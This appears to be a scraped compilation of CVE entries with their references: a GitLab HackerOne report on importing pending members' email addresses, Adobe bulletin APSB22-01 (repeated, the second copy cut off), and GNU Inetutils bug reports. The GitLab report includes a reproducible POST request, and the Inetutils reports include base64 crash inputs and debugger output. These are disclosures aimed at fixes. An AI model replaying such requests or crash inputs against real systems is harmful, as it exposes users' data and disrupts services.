In all versions of GitLab CE/EE since version 12.0, a lower privileged user can import users from projects that they don't have a maintainer role on and disclose email addresses of those users.

**HackerOne report #542539** by `ashish_r_padelkar` on 2019-04-19, assigned to `asaba`:

**Summary**

Hello,

As per documentation here `https://docs.gitlab.com/ee/user/project/members/#import-users-from-another-project` ,

`In the dropdown menu, you can see only the projects you are Maintainer on`.

This is NOT true. You can also see the projects where you have just `Guest` access to.

The problem with this is, once you import members from such projects, a guest can see all pending members who are invited using emails but havent joined the project yet! i.e guests will be able to see all the email ids of the members who are invited using email by Admins but not yet joined gitlab.

If they just visit the url directly in UI, they dont see these members who have not joined gitlab yet!

**Steps to reproduce**

1.  As a Owner in your project, navigate to `https://gitlab.com/<YourUserName>/<YourProject>/project_members/import`
    
2.  When you click on the dropdown, you will not only see the projects where you are maintainer on, but you will see all the projects where you just have `Guest` role too.
    
3.  Select the project where you have `Guest` role and click on `Import Project Members`.
    

The Request responsible for this is

    POST /<YourUserName>/<YourProject>/project_members/apply_import HTTP/1.1  
    Host: gitlab.com  
    Connection: close  
    Content-Length: 157  
    Cache-Control: max-age=0  
    Origin: https://gitlab.com  
    Upgrade-Insecure-Requests: 1  
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
    Referer: 1  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
    Cookie: 1
    
    utf8=%E2%9C%93&authenticity_token=1&source_project_id=10776018  

4.  You can also replace the `source_project_id` parameter in above request with public projects too, and it will import from public projects too!
    
5.  This will import the email ids of member who have not joined the selected project which you dont see when you navigate to member url from UI!
    

**Examples POC**

Navigate to my public project here `https://gitlab.com/gitlabadminrsspl1111/thisispublicproject/project_members`

You will just see one member there.

Now follow the above reproduction steps, and replace the `source_project_id` parameter in above request to `10776018` and send the request

Now check the member list. You will see an email there . This is an invited email which guest users cant see normally as the invited member has not yet joined the gitlab/project!

**What is the current _bug_ behavior?**

Allows you to import pending members from public projects as well as private projects where you just have guest role

**What is the expected _correct_ behavior?**

Only members from project which you have maintainers role should be allowed to import

**Output of checks**

This bug happens on GitLab.com and might be on omnibus installations too

**Impact**

Allows you to import pending members from public projects as well as private projects where you just have guest role.

**Proposal**

The `Import` feature should only allow users to import members from projects where the user has a `Maintainer` role. This should address issues called out under steps 2 and 4 under **Steps to Reproduce** section.

CVE-2021-39892: Import pending members from public projects or private projects (if you have guest role) (#28440) · Issues · GitLab.org / GitLab

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24092  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24091

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative  
    (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc (CVE-2021-45067)
*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-24092, CVE-2022-24091)

**Revisions:**

January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706  
January 27th, 2022: Updated acknowledgment for CVE-2021-45067

March 16, 2022: Added CVE details for CVE-2022-24091 and CVE-2022-24092

March 24, 2022: Updated acknowledgements for CVE-2022-44705 and CVE-2022-44707

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-44705: Adobe Security Bulletin

A NULL pointer dereference in unsetcmd() at inetutils/telnet/commands.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.

\[Date Prev\]\[Date Next\]\[Thread Prev\]\[Thread Next\]\[Date Index\]\[Thread Index\]

**From**:

AiDai

**Subject**:

\[bug #61726\] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

**Date**:

Thu, 23 Dec 2021 09:14:18 -0500 (EST)

**User-agent**:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL:
  <https://savannah.gnu.org/bugs/?61726\>

                 Summary: NULL Pointer Dereference in unsetcmd() at
inetutils/telnet/commands.c:1227
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 02:14:16 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Details:

# NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

## Description

A NULL Pointer Dereference was discovered in unsetcmd() at
inetutils/telnet/commands.c:1227. The vulnerability causes a segmentation
fault and application crash.

\*\*version\*\*

\`\`\`
./telnet --version
telnet (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html\>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
\`\`\`

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
dQsiIA==
\`\`\`

\*\*command:\*\*

\`\`\`
./telnet < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./telnet < ./poc
\[3\]    2387443 segmentation fault  ./telnet < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
1227              \*(ct->charp) = \_POSIX\_VDISABLE;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[
REGISTERS
\]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x55555557bee2 (line+2) ◂— 0x20 /\* ' ' \*/
 RCX  0xfbad2098
 RDX  0x0
 RDI  0x55555557ab20 (Setlist+128) —▸ 0x555555571a7d ◂—
0x67756265640020 /\* ' ' \*/
 RSI  0x555555571a7d ◂— 0x67756265640020 /\* ' ' \*/
 R8   0x55555557bee0 (line) ◂— 0x200075 /\* 'u' \*/
 R9   0x7c
 R10  0x555555572e4c ◂— 0x69626d413f00203e /\* '> ' \*/
 R11  0x246
 R12  0x555555559d20 (\_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
 RIP  0x55555555b592 (unsetcmd+717) ◂— mov    byte ptr \[rax\], 0
──────────────────────────────────────────────\[
DISASM
\]──────────────────────────────────────────────
 ► 0x55555555b592 <unsetcmd+717>    mov    byte ptr \[rax\], 0
   0x55555555b595 <unsetcmd+720>    mov    rax, qword ptr \[rbp - 0x20\]
   0x55555555b599 <unsetcmd+724>    mov    rax, qword ptr \[rax + 0x18\]
   0x55555555b59d <unsetcmd+728>    movzx  eax, byte ptr \[rax\]
   0x55555555b5a0 <unsetcmd+731>    movzx  eax, al
   0x55555555b5a3 <unsetcmd+734>    mov    edi, eax
   0x55555555b5a5 <unsetcmd+736>    call   control                <control>

   0x55555555b5aa <unsetcmd+741>    mov    rdx, rax
   0x55555555b5ad <unsetcmd+744>    mov    rax, qword ptr \[rbp - 0x20\]
   0x55555555b5b1 <unsetcmd+748>    mov    rax, qword ptr \[rax\]
   0x55555555b5b4 <unsetcmd+751>    mov    rsi, rax
──────────────────────────────────────────\[
SOURCE (CODE)
\]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/telnet/commands.c
   1222           (\*ct->handler) (0);
   1223           printf ("%s reset to \\"%s\\".\\n", ct->name, (char \*)
ct->charp);
   1224         }
   1225       else
   1226         {
 ► 1227           \*(ct->charp) = \_POSIX\_VDISABLE;
   1228           printf ("%s character is '%s'.\\n", ct->name,
   1229                   control (\*(ct->charp)));
   1230         }
   1231     }
   1232   return 1;
──────────────────────────────────────────────\[
STACK
\]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe030 —▸ 0x55555557c110 (margv+16) ◂— 0x0
01:0008│     0x7fffffffe038 ◂— 0x5555d867
02:0010│     0x7fffffffe040 —▸ 0x55555557ab20 (Setlist+128) —▸
0x555555571a7d ◂— 0x67756265640020 /\* ' ' \*/
03:0018│     0x7fffffffe048 —▸ 0x55555557bee0 (line) ◂— 0x200075 /\*
'u' \*/
04:0020│     0x7fffffffe050 ◂— 0x0
05:0028│     0x7fffffffe058 —▸ 0x55555557b360 (cmdtab+256) —▸
0x555555572e2f ◂— 0x6f74007465736e75 /\* 'unset' \*/
06:0030│ rbp 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120
◂— 0x0
07:0038│     0x7fffffffe068 —▸ 0x55555555dab9 (command+550) ◂— test 
 eax, eax
────────────────────────────────────────────\[
BACKTRACE
\]─────────────────────────────────────────────
 ► f 0   0x55555555b592 unsetcmd+717
   f 1   0x55555555dab9 command+550
   f 2   0x55555555e3c8 main+776
   f 3   0x7ffff7db50b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  unsetcmd (argc=0, argv=0x55555557c110 <margv+16>) at commands.c:1227
#1  0x000055555555dab9 in command (top=1, tbuf=0x0, cnt=0) at commands.c:3044
#2  0x000055555555e3c8 in main (argc=0, argv=0x7fffffffe220) at main.c:423
#3  0x00007ffff7db50b3 in \_\_libc\_start\_main (main=0x55555555e0c0 <main>,
argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>,
rtld\_fini=<optimized out>, stack\_end=0x7fffffffe208) at
../csu/libc-start.c:308
#4  0x0000555555559d4e in \_start ()
\`\`\`






    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61726\>

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
  Message sent via Savannah
  https://savannah.gnu.org/

\[Prev in Thread\]

**Current Thread**

\[Next in Thread\]

*   **\[bug #61726\] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227**, _AiDai_ **<=**

*   Prev by Date: **\[bug #61725\] NULL Pointer Dereference in help() at inetutils/telnet/commands.c:3094**
*   Next by Date: **Infinite Loop in domacro at domacro.c:258**
*   Previous by thread: **\[bug #61725\] NULL Pointer Dereference in help() at inetutils/telnet/commands.c:3094**
*   Next by thread: **Infinite Loop in domacro at domacro.c:258**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-45779: [bug #61726] NULL Pointer Dereference in unsetcmd() at inetutils/telnet/

A NULL pointer dereference in setnmap() at cmds.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.

\[Date Prev\]\[Date Next\]\[Thread Prev\]\[Thread Next\]\[Date Index\]\[Thread Index\]

**From**:

AiDai

**Subject**:

\[bug #61723\] NULL Pointer Dereference in setnmap() at cmds.c:2303

**Date**:

Thu, 23 Dec 2021 09:13:10 -0500 (EST)

**User-agent**:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL:
  <https://savannah.gnu.org/bugs/?61723\>

                 Summary: NULL Pointer Dereference in setnmap() at cmds.c:2303
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 02:13:08 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Details:

# NULL Pointer Dereference in setnmap() at cmds.c:2303

## Description

A NULL Pointer Dereference was discovered in setnmap() at cmds.c:2303. The
vulnerability causes a segmentation fault and application crash.

\*\*version\*\*

\`\`\`
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html\>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
\`\`\`

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
bm1hIBjyAoHzCcvLArnD/sreCvgmMwoKAPUKEBoKEAAKDgAAAIDn5+fn5wAABADn5+foA+f4FJ0r
CgoKCgoK538Kubn/gAArCgp/CgoKCgoKQn8K1rn/gAAKCgp/CgoKAN0=
\`\`\`

\*\*command:\*\*

\`\`\`
./ftp < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./ftp < ./poc
\[1\]    728662 segmentation fault  ./ftp < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at
cmds.c:2303
2303      \*cp = '\\0';
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[
REGISTERS
\]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x5555555702c0 (\_\_libc\_csu\_init) ◂— endbr64
 RCX  0x4
 RDX  0x0
 RDI  0x555555582aa0 ◂— 0x8102f21820616d6e
 RSI  0x20
 R8   0x555555583620 ◂— 0x8102f21800616d6e /\* 'nma' \*/
 R9   0x7ffff7f5a010 (main\_arena+1168) —▸ 0x7ffff7f5a000 (main\_arena+1152)
—▸ 0x7ffff7f59ff0 (main\_arena+1136) —▸ 0x7ffff7f59fe0
(main\_arena+1120) —▸ 0x7ffff7f59fd0 (main\_arena+1104) ◂— ...
 R10  0x555555580010 ◂— 0x0
 R11  0x7ffff7f59be0 (main\_arena+96) —▸ 0x5555555851a0 ◂— 0x0
 R12  0x555555559f30 (\_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620
◂— 0x8102f21800616d6e /\* 'nma' \*/
 RIP  0x55555555ec9d (setnmap+258) ◂— mov    byte ptr \[rax\], 0
──────────────────────────────────────────────\[
DISASM
\]──────────────────────────────────────────────
 ► 0x55555555ec9d <setnmap+258>    mov    byte ptr \[rax\], 0
   0x55555555eca0 <setnmap+261>    mov    rax, qword ptr \[rip + 0x1ae49\]
<0x555555579af0>
   0x55555555eca7 <setnmap+268>    mov    rdi, rax
   0x55555555ecaa <setnmap+271>    call   rpl\_free                <rpl\_free>

   0x55555555ecaf <setnmap+276>    mov    rax, qword ptr \[rip + 0x1f98a\]
<0x55555557e640>
   0x55555555ecb6 <setnmap+283>    mov    rdi, rax
   0x55555555ecb9 <setnmap+286>    call   strdup@plt               
<strdup@plt>

   0x55555555ecbe <setnmap+291>    mov    qword ptr \[rip + 0x1ae2b\], rax
<0x555555579af0>
   0x55555555ecc5 <setnmap+298>    jmp    setnmap+301               
<setnmap+301>

   0x55555555ecc7 <setnmap+300>    nop
   0x55555555ecc8 <setnmap+301>    add    qword ptr \[rbp - 8\], 1
──────────────────────────────────────────\[
SOURCE (CODE)
\]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/cmds.c
   2298       while (\*++cp == ' ')
   2299         continue;
   2300       altarg = cp;
   2301       cp = strchr (altarg, ' ');
   2302     }
 ► 2303   \*cp = '\\0';
   2304
   2305   free (mapin);
   2306   mapin = strdup (altarg);
   2307
   2308   while (\*++cp == ' ')
──────────────────────────────────────────────\[
STACK
\]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸
0x555555583620 ◂— 0x8102f21800616d6e /\* 'nma' \*/
01:0008│     0x7fffffffe048 ◂— 0x355583620
02:0010│     0x7fffffffe050 —▸ 0x5555555796c0 (cmdtab+2464) ◂— 0x0
03:0018│     0x7fffffffe058 ◂— 0x0
04:0020│ rbp 0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120
◂— 0x0
05:0028│     0x7fffffffe068 —▸ 0x555555566a09 (cmdscanner+633) ◂—
mov    eax, dword ptr \[rip + 0x17bf5\]
06:0030│     0x7fffffffe070 ◂— 0x0
07:0038│     0x7fffffffe078 ◂— 0x1c54c7100
────────────────────────────────────────────\[
BACKTRACE
\]─────────────────────────────────────────────
 ► f 0   0x55555555ec9d setnmap+258
   f 1   0x555555566a09 cmdscanner+633
   f 2   0x55555556665a main+929
   f 3   0x7ffff7d950b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at
cmds.c:2303
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe220) at main.c:310
#3  0x00007ffff7d950b3 in \_\_libc\_start\_main (main=0x5555555662b9 <main>,
argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>,
rtld\_fini=<optimized out>, stack\_end=0x7fffffffe208) at
../csu/libc-start.c:308
#4  0x0000555555559f5e in \_start ()
\`\`\`






    \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61723\>

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
  Message sent via Savannah
  https://savannah.gnu.org/

\[Prev in Thread\]

**Current Thread**

\[Next in Thread\]

*   **\[bug #61723\] NULL Pointer Dereference in setnmap() at cmds.c:2303**, _AiDai_ **<=**

*   Prev by Date: **\[bug #61722\] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186**
*   Next by Date: **\[bug #61724\] Infinite Loop in domacro at domacro.c:258**
*   Previous by thread: **\[bug #61722\] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186**
*   Next by thread: **\[bug #61724\] Infinite Loop in domacro at domacro.c:258**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-45778: [bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303

GNU Inetutils 2.2.16-cf091 was discovered to contain an infinite loop in domacro at domacro.c.

CVE-2021-45775: [bug #61724] Infinite Loop in domacro at domacro.c:258

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

